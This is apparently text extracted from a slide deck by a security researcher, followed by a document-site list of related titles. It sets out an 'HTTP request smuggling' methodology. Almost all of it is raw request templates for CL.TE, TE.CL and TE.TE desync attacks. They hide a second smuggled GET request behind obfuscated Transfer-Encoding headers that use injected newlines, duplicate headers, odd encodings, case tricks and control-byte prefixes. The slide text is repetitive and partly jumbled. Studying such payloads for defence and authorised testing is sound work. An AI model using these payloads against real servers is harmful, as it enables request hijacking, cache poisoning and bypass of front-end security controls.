
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value

● Mine POST / HTTP/1.1

Host: www.company.com
Content-Length: Number
X: X\nTransfer-Encoding: chunked
Y: Y\nTransfer-Encoding: nothing

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling CL.TE , Frontend sees

Content-Length: Number But Backend sees X: X\r\n\rTransfer-Encoding: chunked

● Blog POST / HTTP/1.1

Host: www.company.com
● Resource Content-Length: Number
X: X\r\n\rTransfer-Encoding: chunked

0\r\n
\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.CL , Frontend sees

X: X\r\n\rTransfer-Encoding: chunked But Backend sees Content-Length: Number

● Resource POST / HTTP/1.1

Host: www.company.com
X: X\r\n\rTransfer-Encoding: chunked
● Resource Content-Length: Number

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value

● Mine POST / HTTP/1.1

Host: www.company.com
Content-Length: Number
X: X\r\n\rTransfer-Encoding: chunked
Y: Y\r\n\rTransfer-Encoding: nothing

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling CL.TE , Frontend sees Content-Length:

Number But Backend sees Transfer-Encoding: cow\r\nTransfer-Encoding: chunked

● Resource POST / HTTP/1.1

Host: www.company.com
● Resource Content-Length: Number
Transfer-Encoding: cow\r\nTransfer-Encoding: chunked

0\r\n
\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.CL , Frontend sees Transfer-Encoding:

cow\r\nTransfer-Encoding: chunked But Backend sees Content-Length: Number

● Resource POST / HTTP/1.1

Host: www.company.com
Transfer-Encoding: cow\r\nTransfer-Encoding: chunked
● Resource Content-Length: Number

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value

● Mine POST / HTTP/1.1

Host: www.company.com
Content-Length: Number
Transfer-Encoding: nothing\r\nTransfer-Encoding: chunked

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling CL.TE , Frontend sees

Content-Length: Number But Backend sees Transfer Encoding: chunked

● Video POST / HTTP/1.1

Host: www.company.com
● Resource Content-Length: Number
Transfer Encoding: chunked

0\r\n
\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.CL , Frontend sees

Transfer Encoding: chunked But Backend sees Content-Length: Number

● Resource POST / HTTP/1.1

Host: www.company.com
Transfer Encoding: chunked
● Resource Content-Length: Number

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value

● Mine POST / HTTP/1.1

Host: www.company.com
Content-Length: Number
Transfer Encoding: chunked
Transfer Encoding: nothing

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling CL.TE , Frontend sees

Content-Length: Number But Backend sees Transfer-Encoding: chùnked

● Blog POST / HTTP/1.1

Host: www.company.com
Content-Length: Number
Transfer-Encoding: chùnked

0\r\n
\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.CL , Frontend sees

Transfer-Encoding: chùnked But Backend sees Content-Length: Number

● Mine POST / HTTP/1.1

Host: www.company.com
Transfer-Encoding: chùnked
Content-Length: Number

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value

● Mine POST / HTTP/1.1

Host: www.company.com
Content-Length: Number
Transfer-Encoding: chùnked
Transfer-Encoding: nothing

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling CL.TE , Frontend sees

Content-Length: Number But Backend sees Transfer-Encoding: cow, chunked

● Blog POST / HTTP/1.1

Host: www.company.com
Content-Length: Number
Transfer-Encoding: cow, chunked

0\r\n
\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.CL , Frontend sees

Transfer-Encoding: cow, chunked But Backend sees Content-Length: Number

● Resource POST / HTTP/1.1

Host: www.company.com
Transfer-Encoding: cow, chunked
Content-Length: Number

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value

● Mine POST / HTTP/1.1

Host: www.company.com
Content-Length: Number
Transfer-Encoding: cow, chunked
Transfer-Encoding: nothing

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling CL.TE , Frontend sees

Content-Length: Number But Backend sees Transfer-Encoding: chunked, cow

● Blog POST / HTTP/1.1

Host: www.company.com
Content-Length: Number
Transfer-Encoding: chunked, cow

0\r\n
\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.CL , Frontend sees

Transfer-Encoding: chunked, cowBut Backend sees Content-Length: Number

● Resource POST / HTTP/1.1

Host: www.company.com
Transfer-Encoding: chunked, cow
Content-Length: Number

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value

● Mine POST / HTTP/1.1

Host: www.company.com
Content-Length: Number
Transfer-Encoding: chunked, cow
Transfer-Encoding: nothing

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling CL.TE , Frontend sees

Content-Length: Number But Backend sees Transfer-Encoding: identity, chunked

● Blog POST / HTTP/1.1

Host: www.company.com
Content-Length: Number
Transfer-Encoding: identity, chunked

0\r\n
\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.CL , Frontend sees

Transfer-Encoding: identity, chunked But Backend sees Content-Length: Number

● Mine POST / HTTP/1.1

Host: www.company.com
Transfer-Encoding: identity, chunked
Content-Length: Number

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value

● Mine POST / HTTP/1.1

Host: www.company.com
Content-Length: Number
Transfer-Encoding: identity, chunked
Transfer-Encoding: nothing

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling CL.TE , Frontend sees

Content-Length: Number But Backend sees Transfer-Encoding: cow chunked bar

● Resource POST / HTTP/1.1

Host: www.company.com
Content-Length: Number
Transfer-Encoding: cow chunked bar

0\r\n
\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.CL , Frontend sees

Transfer-Encoding: cow chunked bar But Backend sees Content-Length: Number

● Resource POST / HTTP/1.1

Host: www.company.com
Transfer-Encoding: cow chunked bar
Content-Length: Number

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value

● Mine POST / HTTP/1.1

Host: www.company.com
Content-Length: Number
Transfer-Encoding: cow chunked bar
Transfer-Encoding: nothing

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling CL.TE , Frontend sees

Content-Length: Number But Backend sees Transfer-Encoding:chunked

● Blog POST / HTTP/1.1

Host: www.company.com
● Resource Content-Length: Number
Transfer-Encoding:chunked

0\r\n
\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.CL , Frontend sees

Transfer-Encoding:chunked But Backend sees Content-Length: Number

● Resource POST / HTTP/1.1

Host: www.company.com
Transfer-Encoding:chunked
● Resource Content-Length: Number

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value

● Mine POST / HTTP/1.1

Host: www.company.com
Content-Length: Number
Transfer-Encoding:chunked
Transfer-Encoding:nothing

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling CL.TE , Frontend sees

Content-Length: Number But Backend sees Transfer-Encoding: chunk

● Resource POST / HTTP/1.1

Host: www.company.com
● Resource Content-Length: Number
Transfer-Encoding: chunk

0\r\n
\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.CL , Frontend sees

Transfer-Encoding: chunk But Backend sees Content-Length: Number

● Resource POST / HTTP/1.1

Host: www.company.com
Transfer-Encoding: chunk
● Resource Content-Length: Number

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value

● Mine POST / HTTP/1.1

Host: www.company.com
Content-Length: Number
Transfer-Encoding: chunk
Transfer-Encoding: nothing

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling CL.TE , Frontend sees

Content-Length: Number But Backend sees TrAnSFer-EnCODinG: cHuNkeD

● Resource POST / HTTP/1.1

Host: www.company.com
● Resource Content-Length: Number
TrAnSFer-EnCODinG: cHuNkeD

0\r\n
\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.CL , Frontend sees

TrAnSFer-EnCODinG: cHuNkeD But Backend sees Content-Length: Number

● Resource POST / HTTP/1.1

Host: www.company.com
TrAnSFer-EnCODinG: cHuNkeD
● Resource Content-Length: Number

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value

● Mine POST / HTTP/1.1

Host: www.company.com
Content-Length: Number
TrAnSFer-EnCODinG: cHuNkeD
TrAnSFer-EnCODinG: nOtHiNg

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling CL.TE , Frontend sees

Content-Length: Number But Backend sees TRANSFER-ENCODING: CHUNKED

● Resource POST / HTTP/1.1

Host: www.company.com
● Resource Content-Length: Number
TRANSFER-ENCODING: CHUNKED

0\r\n
\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.CL , Frontend sees

TRANSFER-ENCODING: CHUNKED But Backend sees Content-Length: Number

● Resource POST / HTTP/1.1

Host: www.company.com
TRANSFER-ENCODING: CHUNKED
● Resource Content-Length: Number

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value

● Mine POST / HTTP/1.1

Host: www.company.com
Content-Length: Number
TRANSFER-ENCODING: CHUNKED
TRANSFER-ENCODING: NOTHING

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling CL.TE , Frontend sees

Content-Length: Number But Backend sees \x01Transfer-Encoding: chunked

● Video POST / HTTP/1.1

\x01Transfer-Encoding: chunked
Host: www.company.com
Content-Length: Number

0\r\n
\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.CL , Frontend sees

\x01Transfer-Encoding: chunked But Backend sees Content-Length: Number

● Resource POST / HTTP/1.1

Host: www.company.com
\x01Transfer-Encoding: chunked
Content-Length: Number

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value

● Mine POST / HTTP/1.1

Host: www.company.com
Content-Length: Number
\x01Transfer-Encoding: chunked
\x01Transfer-Encoding: nothing

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling CL.TE , Frontend sees

Content-Length: Number But Backend sees \x07Transfer-Encoding: chunked

● Video POST / HTTP/1.1

\x07Transfer-Encoding: chunked
Host: www.company.com
Content-Length: Number

0\r\n
\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.CL , Frontend sees

\x07Transfer-Encoding: chunked But Backend sees Content-Length: Number

● Resource POST / HTTP/1.1

Host: www.company.com
\x07Transfer-Encoding: chunked
Content-Length: Number

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value

● Mine POST / HTTP/1.1

Host: www.company.com
Content-Length: Number
\x07Transfer-Encoding: chunked
\x07Transfer-Encoding: nothing

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling CL.TE , Frontend sees

Content-Length: Number But Backend sees \x04Transfer-Encoding: chunked

● Video POST / HTTP/1.1

\x04Transfer-Encoding: chunked
Host: www.company.com
Content-Length: Number

0\r\n
\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.CL , Frontend sees

\x04Transfer-Encoding: chunked But Backend sees Content-Length: Number

● Resource POST / HTTP/1.1

Host: www.company.com
\x04Transfer-Encoding: chunked
Content-Length: Number

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value

● Mine POST / HTTP/1.1

Host: www.company.com
Content-Length: Number
\x04Transfer-Encoding: chunked
\x04Transfer-Encoding: nothing

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
Thank
You
Mahmoud M. Awali
@0xAwali

Mozart Voi Che Sapete in A Flat Major For Voice and Piano
100% (1)
Mozart Voi Che Sapete in A Flat Major For Voice and Piano
11 pages
Sample
No ratings yet
Sample
17 pages
Unit 3, Pharmaceutical Organic Chemistry 1, B Pharmacy 2nd Sem, Carewell Pharma
No ratings yet
Unit 3, Pharmaceutical Organic Chemistry 1, B Pharmacy 2nd Sem, Carewell Pharma
19 pages
C3SA Module 03 V1
No ratings yet
C3SA Module 03 V1
116 pages
HTTP Attacks
No ratings yet
HTTP Attacks
65 pages
ARF Creative SonicBranding 2024 10
No ratings yet
ARF Creative SonicBranding 2024 10
29 pages
Dean Michael New York Cafe 2 PDF
No ratings yet
Dean Michael New York Cafe 2 PDF
34 pages
Web Dev
100% (1)
Web Dev
346 pages
L04L - An Introduction To Netcentric Development
No ratings yet
L04L - An Introduction To Netcentric Development
38 pages
Making The Most of HTTP in Your Apps
100% (2)
Making The Most of HTTP in Your Apps
63 pages
HTTP Request Smuggling
No ratings yet
HTTP Request Smuggling
23 pages
HTTP Lecture
No ratings yet
HTTP Lecture
71 pages
Question 1
No ratings yet
Question 1
44 pages
HTTP in Detail
No ratings yet
HTTP in Detail
27 pages
Marketing On Reddit - Content Creation and Strategy
No ratings yet
Marketing On Reddit - Content Creation and Strategy
3 pages
Se Comps CN Week4 Unit 2,3-Lec10-12
No ratings yet
Se Comps CN Week4 Unit 2,3-Lec10-12
89 pages
Intern Report Sambhav Poudel
No ratings yet
Intern Report Sambhav Poudel
45 pages
HTTP Attacks - @CyberFreeCourses
No ratings yet
HTTP Attacks - @CyberFreeCourses
65 pages
Vayner X
100% (1)
Vayner X
6 pages
(CyberSec'24) Lab02 - Student Version
No ratings yet
(CyberSec'24) Lab02 - Student Version
49 pages
1广告关键词文案汇总
No ratings yet
1广告关键词文案汇总
95 pages
MT18 - Paper 1 - TE - 1415 - 5.2
No ratings yet
MT18 - Paper 1 - TE - 1415 - 5.2
24 pages
HRS SMUGGLINGs
No ratings yet
HRS SMUGGLINGs
56 pages
Police Social Media and Broadcast News An Investigation Into The Impact of Police Use of Facebook On Journalists Gatekeeping Role
100% (1)
Police Social Media and Broadcast News An Investigation Into The Impact of Police Use of Facebook On Journalists Gatekeeping Role
19 pages
Browser Powered Desync Attacks Slides
No ratings yet
Browser Powered Desync Attacks Slides
42 pages
Fsa CS4.1 HTTP
No ratings yet
Fsa CS4.1 HTTP
31 pages
HTTP Desync Attacks Slides
No ratings yet
HTTP Desync Attacks Slides
32 pages
Time and Work @yt
No ratings yet
Time and Work @yt
42 pages
Lecture 1 - Intro To Web Technologies
No ratings yet
Lecture 1 - Intro To Web Technologies
46 pages
Lecture No 2 Fall 2020
No ratings yet
Lecture No 2 Fall 2020
33 pages
Part - 2 Understanding Hyper Text Transport Protocol
No ratings yet
Part - 2 Understanding Hyper Text Transport Protocol
6 pages
HTTP Request Smuggling
No ratings yet
HTTP Request Smuggling
43 pages
Recall Labels 006 2024
No ratings yet
Recall Labels 006 2024
29 pages
WT - Assignment 01
No ratings yet
WT - Assignment 01
18 pages
Comparative Analysis of Law Firm AdvertisingBangladesh Vs United States
No ratings yet
Comparative Analysis of Law Firm AdvertisingBangladesh Vs United States
14 pages
Ccs 2021 Treqs
No ratings yet
Ccs 2021 Treqs
16 pages
HTTP Desync Attack
No ratings yet
HTTP Desync Attack
18 pages
PG 1
No ratings yet
PG 1
77 pages
Unit2-2.1Handling Request Headers
No ratings yet
Unit2-2.1Handling Request Headers
43 pages
Overview of HTTP
No ratings yet
Overview of HTTP
4 pages
Web Security (CAT-309) - Unit 1 Lecture 3
No ratings yet
Web Security (CAT-309) - Unit 1 Lecture 3
13 pages
HTTP-Basics
No ratings yet
HTTP-Basics
33 pages
Making The Most of HTTP in Your Apps
100% (2)
Making The Most of HTTP in Your Apps
70 pages
HTTP 2 White Paper
No ratings yet
HTTP 2 White Paper
26 pages
Punctuation Fun Activities Games 65459
No ratings yet
Punctuation Fun Activities Games 65459
21 pages
HTTP Basics3
No ratings yet
HTTP Basics3
11 pages
Cheese Willem Elsschot Download
100% (1)
Cheese Willem Elsschot Download
28 pages
About HTTP Protocol
No ratings yet
About HTTP Protocol
42 pages
Minta BLB
No ratings yet
Minta BLB
12 pages
HTTP - Request Explain
No ratings yet
HTTP - Request Explain
11 pages
The Contemporary World Week 8
No ratings yet
The Contemporary World Week 8
25 pages
Just A Name Following Some Syntax. URL & URN Are Subsets of URI
No ratings yet
Just A Name Following Some Syntax. URL & URN Are Subsets of URI
30 pages
HTTP Basics
No ratings yet
HTTP Basics
3 pages
Airbus 319-320-321 - (AIPC) (28-13-42-03A SEAL INSTL-VAPOUR)
No ratings yet
Airbus 319-320-321 - (AIPC) (28-13-42-03A SEAL INSTL-VAPOUR)
11 pages
What Are HTTP Headers?: All About PHP in Interaction With HTTP & Dom
No ratings yet
What Are HTTP Headers?: All About PHP in Interaction With HTTP & Dom
56 pages
EG Practical HDR Broadcast Workflows
No ratings yet
EG Practical HDR Broadcast Workflows
16 pages
HTTP
No ratings yet
HTTP
30 pages
Lect15 - HTTP
No ratings yet
Lect15 - HTTP
13 pages
HTTP Request Smuggling
No ratings yet
HTTP Request Smuggling
6 pages
Hypertext Transport Protocol: CS - 328 Dick Steflik
No ratings yet
Hypertext Transport Protocol: CS - 328 Dick Steflik
20 pages
HTTP Response Smuggling - Paper
No ratings yet
HTTP Response Smuggling - Paper
24 pages
Disney 2024.04.13 16.58.46
No ratings yet
Disney 2024.04.13 16.58.46
3 pages
Web Technologies Fundamentals and HTTP
No ratings yet
Web Technologies Fundamentals and HTTP
35 pages
HTTP
No ratings yet
HTTP
4 pages
HTTP - Requests
No ratings yet
HTTP - Requests
5 pages
HTTP Request Smuggling in 2020
No ratings yet
HTTP Request Smuggling in 2020
13 pages
Tutorial Lab 3
No ratings yet
Tutorial Lab 3
4 pages
Hyper Text Transfer Protocol (HTTP)
No ratings yet
Hyper Text Transfer Protocol (HTTP)
21 pages
HTTP
No ratings yet
HTTP
2 pages
Day 1.2
No ratings yet
Day 1.2
4 pages
Final Quiz in Ed 110
No ratings yet
Final Quiz in Ed 110
3 pages
Script 2024
No ratings yet
Script 2024
10 pages
Kanna KizuchiGallery Your Turn To Die Wiki Fandom
No ratings yet
Kanna KizuchiGallery Your Turn To Die Wiki Fandom
1 page
Code of Ethics: Dr. G. C. Prem Nivas
No ratings yet
Code of Ethics: Dr. G. C. Prem Nivas
9 pages
HTTP Overview
No ratings yet
HTTP Overview
14 pages
Sydney Ross Mitchell - Do It Again Lyrics Genius Lyrics
No ratings yet
Sydney Ross Mitchell - Do It Again Lyrics Genius Lyrics
1 page
Lab07 HTTP
No ratings yet
Lab07 HTTP
4 pages
A Practical Guide To Writing Clients and Servers: Go To Table of Contents Go To Footnotes Go To Other Tutorials
No ratings yet
A Practical Guide To Writing Clients and Servers: Go To Table of Contents Go To Footnotes Go To Other Tutorials
18 pages
Rajagiri School of Engineering & Technology: Rajagiri Valley, Kakkanad, Cochin - 682 039
No ratings yet
Rajagiri School of Engineering & Technology: Rajagiri Valley, Kakkanad, Cochin - 682 039
21 pages
ENCS3320 Project1V1
No ratings yet
ENCS3320 Project1V1
3 pages
Protocolo HTTP
No ratings yet
Protocolo HTTP
6 pages
HTTP Headers
No ratings yet
HTTP Headers
2 pages
World Wide Web - Part I: Indian Institute of Technology Kharagpur
No ratings yet
World Wide Web - Part I: Indian Institute of Technology Kharagpur
23 pages
Araihca-Human Wizard 1
No ratings yet
Araihca-Human Wizard 1
2 pages
Expressing Idea and Debating Skills
No ratings yet
Expressing Idea and Debating Skills
4 pages
Facts Pacts: Studio-Producer Deals Retreat As Sony, Warners Pull Back
No ratings yet
Facts Pacts: Studio-Producer Deals Retreat As Sony, Warners Pull Back
1 page
Osi Model
No ratings yet
Osi Model
3 pages
World Wide Web: Uniform Resource Locators (URL)
No ratings yet
World Wide Web: Uniform Resource Locators (URL)
5 pages
Introduction to PHP, Part 1, Second Edition
From Everand
Introduction to PHP, Part 1, Second Edition
Adam Majczak
No ratings yet
Hacking of Computer Networks: Full Course on Hacking of Computer Networks
From Everand
Hacking of Computer Networks: Full Course on Hacking of Computer Networks
Dr. Hidaia Mahmood Alassouli
No ratings yet